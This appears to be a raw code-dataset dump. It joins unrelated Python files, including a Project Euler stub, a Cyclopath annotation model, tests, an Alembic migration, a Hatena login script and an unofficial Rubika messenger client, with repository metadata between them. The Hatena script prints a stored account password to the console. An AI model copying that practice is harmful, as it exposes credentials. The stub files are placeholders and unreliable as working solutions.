] | null | null | null | # Solution of;
# Project Euler Problem 105: Special subset sums: testing
# https://projecteuler.net/problem=105
#
# Let S(A) represent the sum of elements in set A of size n.
# We shall call it a special sum set if for any two non-empty disjoint
# subsets, B and C, the following properties are true:
#
# S(B) ≠ S(C); that is, sums of subsets cannot be equal.
# If B contains more elements than C then S(B) > S(C).
# For example, {81, 88, 75, 42, 87, 84, 86, 65} is not a special sum set
# because 65 + 87 + 88 = 75 + 81 + 84, whereas
# {157, 150, 164, 119, 79, 159, 161, 139, 158} satisfies both rules
# for all possible subset pair combinations and S(A) = 1286.
#
# Using sets.txt (right click and "Save Link/Target As..."), a 4K text file
# with one-hundred sets containing seven to twelve elements
# (the two examples given above are the first two sets in the file),
# identify all the special sum sets, A1, A2, ..., Ak,
# and find the value of S(A1) + S(A2) + ... + S(Ak).
# NOTE: This problem is related to Problem 103 and Problem 106.
#
# by lcsm29 http://github.com/lcsm29/project-euler
import timed
def dummy(n):
pass
if __name__ == '__main__':
n = 1000
i = 10000
prob_id = 102
timed.caller(dummy, n, i, prob_id)
| 34.916667 | 76 | 0.67144 | 222 | 1,257 | 3.761261 | 0.608108 | 0.035928 | 0.026347 | 0.033533 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092105 | 0.214002 | 1,257 | 35 | 77 | 35.914286 | 0.752024 | 0.842482 | 0 | 0 | 0 | 0 | 0.045977 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.125 | 0.125 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e62e5420e9280590cadcb41f39f8b617ff3cad05 | 3,673 | py | Python | pyserver/item/attc/annotation.py | lbouma/Cyclopath | d09d927a1e6f9e07924007fd39e8e807cd9c0f8c | [
"Apache-2.0"
] | 15 | 2015-05-06T05:11:48.000Z | 2021-12-03T14:56:58.000Z | pyserver/item/attc/annotation.py | landonb/Cyclopath | d09d927a1e6f9e07924007fd39e8e807cd9c0f8c | [
"Apache-2.0"
] | null | null | null | pyserver/item/attc/annotation.py | landonb/Cyclopath | d09d927a1e6f9e07924007fd39e8e807cd9c0f8c | [
"Apache-2.0"
] | 8 | 2015-05-06T05:11:36.000Z | 2020-11-04T05:11:22.000Z | # Copyright (c) 2006-2013 Regents of the University of Minnesota.
# For licensing terms, see the file LICENSE.
import conf
import g
from item import attachment
from item import item_base
from item import item_versioned
from item.util.item_type import Item_Type
from util_.streetaddress import ccp_stop_words
log = g.log.getLogger('annotation')
class One(attachment.One):
item_type_id = Item_Type.ANNOTATION
item_type_table = 'annotation'
item_gwis_abbrev = 'anno'
child_item_types = None
local_defns = [
# py/psql name, deft, send?, pkey?, pytyp, reqv
('comments', None, True, False, str, 2),
]
attr_defns = attachment.One.attr_defns + local_defns
psql_defns = attachment.One.psql_defns + local_defns
gwis_defns = item_base.One.attr_defns_reduce_for_gwis(attr_defns)
__slots__ = [] + [attr_defn[0] for attr_defn in local_defns]
# *** Constructor
def __init__(self, qb=None, row=None, req=None, copy_from=None):
g.assurt(copy_from is None) # Not supported for this class.
attachment.One.__init__(self, qb, row, req, copy_from)
# *** Saving to the Database
#
def save_core(self, qb):
attachment.One.save_core(self, qb)
# Save to the 'annotation' table.
self.save_insert(qb, One.item_type_table, One.psql_defns)
# ***
class Many(attachment.Many):
one_class = One
__slots__ = ()
sql_clauses_cols_all = attachment.Many.sql_clauses_cols_all.clone()
# FIXME: Maybe call a fcn. instead, like opt/argparse? Or does that
# just complicate things more?
#sqlc_all.inner.select_list("annot.comments")
sql_clauses_cols_all.inner.shared += (
"""
, annot.comments
"""
)
sql_clauses_cols_all.inner.join += (
"""
JOIN annotation AS annot
ON (gia.item_id = annot.system_id)
"""
)
sql_clauses_cols_all.outer.shared += (
"""
, group_item.comments
"""
)
# *** Constructor
def __init__(self):
attachment.Many.__init__(self)
# *** Query Builder routines
# FIXME [aa] Only get gf's whose username = '' or = [current_user]
# FIXME [aa] Security leak -- private annotations being sent to client
# 2012.04.02: Is this really still true??
# FIXME Send where feat_type != and append feat_type == region_watched
# FIXME [aa] Bug: Deleted and old version attachments being sent for no-diff
# Is this a regression, or have annots always been fetches this way?
# SELECT DISTINCT
# lhs_stack_id AS id,
# version,
# comments
# FROM annotation_geo AS ag
# WHERE (ST_Intersects(ag.geometry,
# ST_SetSRID('BOX(479932.800000 4978592.800000,
# 482124.800000 4981408.800000)'::box2d,
# 26915)))
#
def sql_apply_query_filters(self, qb, where_clause="", conjunction=""):
g.assurt((not where_clause) and (not conjunction))
g.assurt((not conjunction) or (conjunction == "AND"))
where_clause = attachment.Many.sql_apply_query_filters(
self, qb, where_clause, conjunction)
return where_clause
#
def sql_apply_query_filter_by_text(self, qb, table_cols, stop_words,
use_outer=False):
table_cols.insert(0, 'annot.comments')
stop_words = ccp_stop_words.Addy_Stop_Words__Annotation
return attachment.Many.sql_apply_query_filter_by_text(
self, qb, table_cols, stop_words, use_outer)
# ***
# ***
| 30.355372 | 79 | 0.632181 | 468 | 3,673 | 4.681624 | 0.401709 | 0.021908 | 0.031949 | 0.038795 | 0.140575 | 0.127796 | 0.127796 | 0.095847 | 0.095847 | 0.052031 | 0 | 0.027975 | 0.270079 | 3,673 | 120 | 80 | 30.608333 | 0.789258 | 0.342499 | 0 | 0 | 0 | 0 | 0.022122 | 0 | 0 | 0 | 0 | 0.016667 | 0 | 1 | 0.1 | false | 0 | 0.14 | 0 | 0.56 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
e64d35a8b39dc13cbd44e4267a4f6d20a1f20bd8 | 746 | py | Python | games/stock/environment.py | hkp1030/muzero-stock | d3acddf11afa523b81bbe1a626a50c95eb78c165 | [
"MIT"
] | 1 | 2022-01-21T21:15:49.000Z | 2022-01-21T21:15:49.000Z | games/stock/environment.py | hkp1030/muzero-stock | d3acddf11afa523b81bbe1a626a50c95eb78c165 | [
"MIT"
] | null | null | null | games/stock/environment.py | hkp1030/muzero-stock | d3acddf11afa523b81bbe1a626a50c95eb78c165 | [
"MIT"
] | 1 | 2022-01-21T21:30:37.000Z | 2022-01-21T21:30:37.000Z | class Environment:
PRICE_IDX = 4 # 종가의 위치
def __init__(self, chart_data=None, training_data=None):
self.chart_data = chart_data
self.training_data = training_data
self.observation = None
self.idx = -1
def reset(self):
self.observation = None
self.idx = -1
def is_done(self):
if self.idx + 1 >= len(self.training_data):
return True
else:
return False
def observe(self):
if self.is_done():
return None
self.idx += 1
self.observation = self.training_data.iloc[self.idx]
return self.observation.tolist()
def get_price(self):
return self.chart_data.iloc[self.idx][self.PRICE_IDX]
| 24.866667 | 61 | 0.591153 | 96 | 746 | 4.40625 | 0.302083 | 0.099291 | 0.07565 | 0.085106 | 0.141844 | 0.141844 | 0.141844 | 0 | 0 | 0 | 0 | 0.009766 | 0.313673 | 746 | 29 | 62 | 25.724138 | 0.816406 | 0.008043 | 0 | 0.173913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.217391 | false | 0 | 0 | 0.043478 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
e651cc7d2f10c7d86c7ce7b411ef45695942e02f | 1,320 | py | Python | tests/test_utils.py | SalemHarrache/dbcut | 0fd60e15f3b5532c5c531923d2e9ef08ce17c935 | [
"MIT"
] | 16 | 2019-11-22T16:36:56.000Z | 2022-03-12T01:49:03.000Z | tests/test_utils.py | SalemHarrache/dbcut | 0fd60e15f3b5532c5c531923d2e9ef08ce17c935 | [
"MIT"
] | 3 | 2019-11-23T06:11:30.000Z | 2020-06-23T13:34:04.000Z | tests/test_utils.py | SalemHarrache/dbcut | 0fd60e15f3b5532c5c531923d2e9ef08ce17c935 | [
"MIT"
] | 4 | 2019-11-22T20:42:57.000Z | 2022-02-23T09:10:00.000Z | import unittest
from collections import OrderedDict
from dbcut.utils import sorted_nested_dict
def test_simple_dict_is_sorted():
data = {
"c": 1,
"a": 2,
"b": 3,
}
expected = OrderedDict([("a", 2), ("b", 3), ("c", 1)])
assert expected == sorted_nested_dict(data)
def test_nested_iterables_are_sorted():
data = {
"c": [1, 3, 2],
"a": 2,
"b": (3, 1, 2),
}
expected = OrderedDict(
[
("a", 2),
# The tuple is transformed into a list here. Still an iterable though.
("b", [1, 2, 3]),
("c", [1, 2, 3]),
]
)
assert expected == sorted_nested_dict(data)
def test_nested_dicts_are_sorted():
data = {
"c": 1,
"a": {"b": 1, "a": 2},
"b": 3,
}
expected = OrderedDict(
[("a", OrderedDict([("a", 2), ("b", 1)])), ("b", 3), ("c", 1)]
)
assert expected == sorted_nested_dict(data)
def test_non_dicts_are_untouched():
data = "ravioli"
assert data is sorted_nested_dict(data)
data = ["r", "a", "v", "i", "o", "l", "i"]
assert data is sorted_nested_dict(data)
data = 42
assert data is sorted_nested_dict(data)
class Custom:
pass
data = Custom()
assert data is sorted_nested_dict(data)
| 22.372881 | 82 | 0.524242 | 172 | 1,320 | 3.837209 | 0.27907 | 0.145455 | 0.193939 | 0.212121 | 0.562121 | 0.498485 | 0.498485 | 0.401515 | 0.216667 | 0.136364 | 0 | 0.032931 | 0.309848 | 1,320 | 58 | 83 | 22.758621 | 0.691548 | 0.051515 | 0 | 0.391304 | 0 | 0 | 0.0288 | 0 | 0 | 0 | 0 | 0 | 0.152174 | 1 | 0.086957 | false | 0.021739 | 0.065217 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e66228a86c2396ec8a63b8d48e9ca8a5edd9c594 | 502 | py | Python | migrations/versions/1d09e9261d5_.py | mainulhossain/biowl | 039adc96539fae25843b1fc36074a4e5e55830ec | [
"MIT"
] | null | null | null | migrations/versions/1d09e9261d5_.py | mainulhossain/biowl | 039adc96539fae25843b1fc36074a4e5e55830ec | [
"MIT"
] | null | null | null | migrations/versions/1d09e9261d5_.py | mainulhossain/biowl | 039adc96539fae25843b1fc36074a4e5e55830ec | [
"MIT"
] | 1 | 2020-01-05T10:47:21.000Z | 2020-01-05T10:47:21.000Z | """empty message
Revision ID: 1d09e9261d5
Revises: 40d93619b7d
Create Date: 2016-12-16 11:38:41.336859
"""
# revision identifiers, used by Alembic.
revision = '1d09e9261d5'
down_revision = '40d93619b7d'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
pass
### end Alembic commands ###
| 18.592593 | 63 | 0.687251 | 60 | 502 | 5.733333 | 0.616667 | 0.078488 | 0.122093 | 0.133721 | 0.372093 | 0.372093 | 0.372093 | 0.372093 | 0.372093 | 0.372093 | 0 | 0.129353 | 0.199203 | 502 | 26 | 64 | 19.307692 | 0.726368 | 0.575697 | 0 | 0.25 | 0 | 0 | 0.122222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.25 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
e669828a1fd8d946f628655596de52579956c2b4 | 442 | py | Python | Leetcode/560-Subarray_Sum.py | EdwaRen/Competitve-Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | 1 | 2021-05-03T21:48:25.000Z | 2021-05-03T21:48:25.000Z | Leetcode/560-Subarray_Sum.py | EdwaRen/Competitve_Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | null | null | null | Leetcode/560-Subarray_Sum.py | EdwaRen/Competitve_Programming | e8bffeb457936d28c75ecfefb5a1f316c15a9b6c | [
"MIT"
] | null | null | null | class Solution(object):
def subarraySum(self, nums, k):
sum = 0
res = 0
sum_history = {0:1}
for i in nums:
sum+=i
if sum - k in sum_history:
res+=sum_history[sum-k]
if sum in sum_history:
sum_history[sum]+=1
else:
sum_history[sum] = 1
return res
a = Solution()
print(a.subarraySum([1, 2, 1, 2], 3))
| 22.1 | 39 | 0.466063 | 59 | 442 | 3.389831 | 0.389831 | 0.3 | 0.26 | 0.14 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 0.427602 | 442 | 19 | 40 | 23.263158 | 0.747036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.1875 | 0.0625 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0501d436e365fc40c731e765ab901eb50645cb02 | 1,489 | py | Python | main.py | ytyaru/Hatena.WebSite.Login.201703040757 | 11ffc5549398478146a9966189e06cf535b34092 | [
"CC0-1.0"
] | null | null | null | main.py | ytyaru/Hatena.WebSite.Login.201703040757 | 11ffc5549398478146a9966189e06cf535b34092 | [
"CC0-1.0"
] | null | null | null | main.py | ytyaru/Hatena.WebSite.Login.201703040757 | 11ffc5549398478146a9966189e06cf535b34092 | [
"CC0-1.0"
] | null | null | null | #!python3
#encoding:utf-8
from urllib.request import build_opener, HTTPCookieProcessor
from urllib.parse import urlencode
from http.cookiejar import CookieJar
import pprint
import dataset
class HatenaSite(object):
def __init__(self, path_hatena_accounts_sqlite3):
self.path_hatena_accounts_sqlite3 = path_hatena_accounts_sqlite3
self.db_accounts = dataset.connect('sqlite:///' + path_hatena_accounts_sqlite3)
def login(self, hatena_id):
account = self.db_accounts['Accounts'].find_one(HatenaId=hatena_id)
if (None == account):
print('{0} のはてなIDを持ったアカウント情報は次のDBに存在しません。: {1}'.format(hatena, self.path_hatena_accounts_sqlite3))
return
print(account['Password'])
opener = build_opener(HTTPCookieProcessor(CookieJar()))
post = {
'name': hatena_id,
'password': account['Password']
}
data = urlencode(post).encode('utf-8')
res = opener.open('https://www.hatena.ne.jp/login', data)
pprint.pprint(res.getheaders())
res.close()
url = 'http://f.hatena.ne.jp/{0}/{1}/rss'.format(hatena_id, 'Hatena Blog')
res = opener.open(url)
with open('photo_life.xml', 'wb') as f:
f.write(res.read())
res.close()
if __name__ == '__main__':
hatena_id = 'ytyaru'
client = HatenaSite(
path_hatena_accounts_sqlite3 = "meta_Hatena.Accounts.sqlite3"
)
client.login(hatena_id)
| 33.088889 | 110 | 0.646071 | 173 | 1,489 | 5.312139 | 0.421965 | 0.106638 | 0.159956 | 0.163221 | 0.126224 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.229013 | 1,489 | 44 | 111 | 33.840909 | 0.788328 | 0.014775 | 0 | 0.057143 | 0 | 0 | 0.151639 | 0.040301 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0.057143 | 0.142857 | 0 | 0.257143 | 0.114286 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0511c5e889756be6d1498e4e5630fe4522e1af10 | 176 | py | Python | dzien1/p1_start.py | angelm1974/przyklady | ee0483ca69b789270641f3cd6c945b0cd0afbea9 | [
"MIT"
] | 1 | 2021-09-20T21:48:11.000Z | 2021-09-20T21:48:11.000Z | dzien1/p1_start.py | angelm1974/przyklady | ee0483ca69b789270641f3cd6c945b0cd0afbea9 | [
"MIT"
] | null | null | null | dzien1/p1_start.py | angelm1974/przyklady | ee0483ca69b789270641f3cd6c945b0cd0afbea9 | [
"MIT"
] | null | null | null |
from PyQt6.QtWidgets import QApplication, QWidget
import sys # komentarz
app = QApplication(sys.argv) # ([]) -bez argumentów
window = QWidget()
window.show()
app.exec()
| 14.666667 | 52 | 0.715909 | 21 | 176 | 6 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006757 | 0.159091 | 176 | 11 | 53 | 16 | 0.844595 | 0.170455 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
051e064cf78fe1b3efaa1e563322f576984f94e9 | 24,624 | py | Python | rubika/client.py | Bahman-Ahmadi/rubika | 924e82434f9468cadf481af7b29695f642af7e99 | [
"MIT"
] | 23 | 2021-12-06T09:54:01.000Z | 2022-03-31T19:44:29.000Z | rubika/client.py | Bahman-Ahmadi/rubika | 924e82434f9468cadf481af7b29695f642af7e99 | [
"MIT"
] | 4 | 2022-01-08T19:27:40.000Z | 2022-03-30T13:18:23.000Z | rubika/client.py | Bahman-Ahmadi/rubika | 924e82434f9468cadf481af7b29695f642af7e99 | [
"MIT"
] | 13 | 2021-12-08T14:18:39.000Z | 2022-03-30T13:20:37.000Z | from pathlib import Path
from requests import post
from random import randint
from json import loads, dumps
import random, datetime, rubika.encryption
# because should be exist !
adminsAccess = {
"pin":"PinMessages",
"newAdmin":"SetAdmin",
"editInfo":"ChangeInfo",
"banMember":"BanMember",
"changeLink":"SetJoinLink",
"changeMembersAccess":"SetMemberAccess",
"deleteMessages":"DeleteGlobalAllMessages"
}
usersAccess = {
"addMember":"AddMember",
"viewAdmins":"ViewAdmins",
"viewMembers":"ViewMembers",
"sendMessage":"SendMessages"
}
class Bot:
def __init__(self, auth):
self.auth = auth
self.enc = rubika.encryption.encryption(auth)
@staticmethod
def _getURL():
return "https://messengerg2c64.iranlms.ir/"
'''
result = []
for i in range(11,99): result.append(f"https://messengerg2c{i}.iranlms.ir/")
return random.choice(result)
'''
def _requestSendFile(self, file):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"requestSendFile",
"input":{
"file_name": str(file.split("/")[-1]),
"mime": file.split(".")[-1],
"size": Path(file).stat().st_size
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json()["data_enc"]))["data"]
def _uploadFile(self, file):
frequest = Bot._requestSendFile(self, file)
bytef = open(file,"rb").read()
hash_send = frequest["access_hash_send"]
file_id = frequest["id"]
url = frequest["upload_url"]
header = {
'auth':self.auth,
'Host':url.replace("https://","").replace("/UploadFile.ashx",""),
'chunk-size':str(Path(file).stat().st_size),
'file-id':str(file_id),
'access-hash-send':hash_send,
"content-type": "application/octet-stream",
"content-length": str(Path(file).stat().st_size),
"accept-encoding": "gzip",
"user-agent": "okhttp/3.12.1"
}
if len(bytef) <= 131072:
header["part-number"], header["total-part"] = "1","1"
while True:
try:
j = post(data=bytef,url=url,headers=header).text
j = loads(j)['data']['access_hash_rec']
break
except Exception as e:
continue
return [frequest, j]
else:
t = random._floor(len(bytef) / 131072 + 1)
for i in range(1,t+1):
if i != t:
k = i - 1
k = k * 131072
while True:
try:
header["chunk-size"], header["part-number"], header["total-part"] = "131072", str(i),str(t)
o = post(data=bytef[k:k + 131072],url=url,headers=header).text
o = loads(o)['data']
break
except Exception as e:
continue
else:
k = i - 1
k = k * 131072
while True:
try:
header["chunk-size"], header["part-number"], header["total-part"] = str(len(bytef[k:])), str(i),str(t)
p = post(data=bytef[k:],url=url,headers=header).text
p = loads(p)['data']['access_hash_rec']
break
except Exception as e:
continue
return [frequest, p]
def sendMessage(self, chat_id, text, metadata=[], message_id=None):
inData = {
"method":"sendMessage",
"input":{
"object_guid":chat_id,
"rnd":f"{randint(100000,999999999)}",
"text":text,
"reply_to_message_id":message_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}
if metadata != [] : inData["input"]["metadata"] = {"meta_data_parts":metadata}
return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps(inData))},url=Bot._getURL())
def editMessage(self, message_id, chat_id, newText):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"editMessage",
"input":{
"message_id": message_id,
"object_guid": chat_id,
"text": newText
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def deleteMessages(self, chat_id, message_ids):
return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"deleteMessages",
"input":{
"object_guid":chat_id,
"message_ids":message_ids,
"type":"Global"
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def getUserInfo(self, chat_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getUserInfo",
"input":{
"user_guid":chat_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json()["data_enc"]))
def getMessages(self, chat_id,min_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesInterval",
"input":{
"object_guid":chat_id,
"middle_message_id":min_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("messages")
def getInfoByUsername(self, username):
''' username should be without @ '''
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getObjectByUsername",
"input":{
"username":username
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json().get("data_enc")))
def banGroupMember(self, chat_id, user_id):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"banGroupMember",
"input":{
"group_guid": chat_id,
"member_guid": user_id,
"action":"Set"
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def invite(self, chat_id, user_ids):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"addGroupMembers",
"input":{
"group_guid": chat_id,
"member_guids": user_ids
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def getGroupAdmins(self, chat_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"client":{
"app_name":"Main",
"app_version":"2.9.5",
"lang_code":"fa",
"package":"ir.resaneh1.iptv",
"platform":"Android"
},
"input":{
"group_guid":chat_id
},
"method":"getGroupAdminMembers"
}))},url=Bot._getURL()).json().get("data_enc")))
def getMessagesInfo(self, chat_id, message_ids):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getMessagesByID",
"input":{
"object_guid": chat_id,
"message_ids": message_ids
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))}, url=Bot._getURL()).json()["data_enc"])).get("data").get("messages")
def setMembersAccess(self, chat_id, access_list):
return post(json={
"api_version": "4",
"auth": self.auth,
"client": {
"app_name": "Main",
"app_version": "2.9.5",
"lang_code": "fa",
"package": "ir.resaneh1.iptv",
"platform": "Android"
},
"data_enc": self.enc.encrypt(dumps({
"access_list": access_list,
"group_guid": chat_id
})),
"method": "setGroupDefaultAccess"
}, url=Bot._getURL())
def getGroupMembers(self, chat_id):
return loads(self.enc.decrypt(post(json={
"api_version":"5",
"auth": self.auth,
"data_enc": self.enc.encrypt(dumps({
"method":"getGroupAllMembers",
"input":{
"group_guid": chat_id,
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))
}, url=Bot._getURL()).json()["data_enc"]))["data"]["in_chat_members"]
def getGroupInfo(self, chat_id):
return loads(self.enc.decrypt(post(
json={
"api_version":"5",
"auth": self.auth,
"data_enc": self.enc.encrypt(dumps({
"method":"getGroupInfo",
"input":{
"group_guid": chat_id,
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))}, url=Bot._getURL()).json()["data_enc"]))
def getGroupLink(self, chat_id):
return loads(self.enc.decrypt(post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"getGroupLink",
"input":{
"group_guid":chat_id
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL()).json().get("data_enc"))).get("data").get("join_link")
def changeGroupLink(self, chat_id):
return post(json={
"api_version":"4",
"auth":self.auth,
"client":{
"app_name":"Main",
"app_version":"2.8.1",
"lang_code":"fa",
"package":"ir.resaneh1.iptv",
"platform":"Android"
},
"data_enc":self.enc.encrypt(dumps({
"group_guid": chat_id
})),
"method":"setGroupLink",
},url=Bot._getURL())
def setGroupTimer(self, chat_id, time):
return post(json={
"api_version":"4",
"auth":self.auth,
"client":{
"app_name":"Main",
"app_version":"2.8.1",
"platform":"Android",
"package":"ir.resaneh1.iptv",
"lang_code":"fa"
},
"data_enc":self.enc.encrypt(dumps({
"group_guid": chat_id,
"slow_mode": time,
"updated_parameters":["slow_mode"]
})),
"method":"editGroupInfo"
},url=Bot._getURL())
def setGroupAdmin(self, chat_id, user_id, access_list=[]):
return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"setGroupAdmin",
"input":{
"group_guid": chat_id,
"access_list": access_list,
"action": "SetAdmin",
"member_guid": user_id
},
"client":{
"app_name":"Main",
"app_version":"2.8.1",
"platform":"Android",
"package":"ir.resaneh1.iptv",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def deleteGroupAdmin(self, chat_id, user_id, access_list=[]):
return post(json={"api_version":"5","auth":self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"setGroupAdmin",
"input":{
"group_guid": chat_id,
"action": "UnsetAdmin",
"member_guid": user_id
},
"client":{
"app_name":"Main",
"app_version":"2.8.1",
"platform":"Android",
"package":"ir.resaneh1.iptv",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def logout(self):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"logout",
"input":{},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def forwardMessages(self, From, message_ids, to):
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"forwardMessages",
"input":{
"from_object_guid": From,
"message_ids": message_ids,
"rnd": f"{randint(100000,999999999)}",
"to_object_guid": to
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def seenChats(self, seenList):
# seenList should be a dict , keys are object guids and values are last message’s id, {"guid":"msg_id"}
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"seenChats",
"input":{
"seen_list": seenList
},
"client":{
"app_name":"Main",
"app_version":"3.2.1",
"platform":"Web",
"package":"web.rubika.ir",
"lang_code":"fa"
}
}))},url=Bot._getURL())
def sendChatAction(self, chat_id, action):
#every some seconds before sending message this request should send
return post(json={"api_version":"5","auth": self.auth,"data_enc":self.enc.encrypt(dumps({
"method":"sendChatActivity",
"input":{
"activity": action,
"object_guid": chat_id
},
"client":{
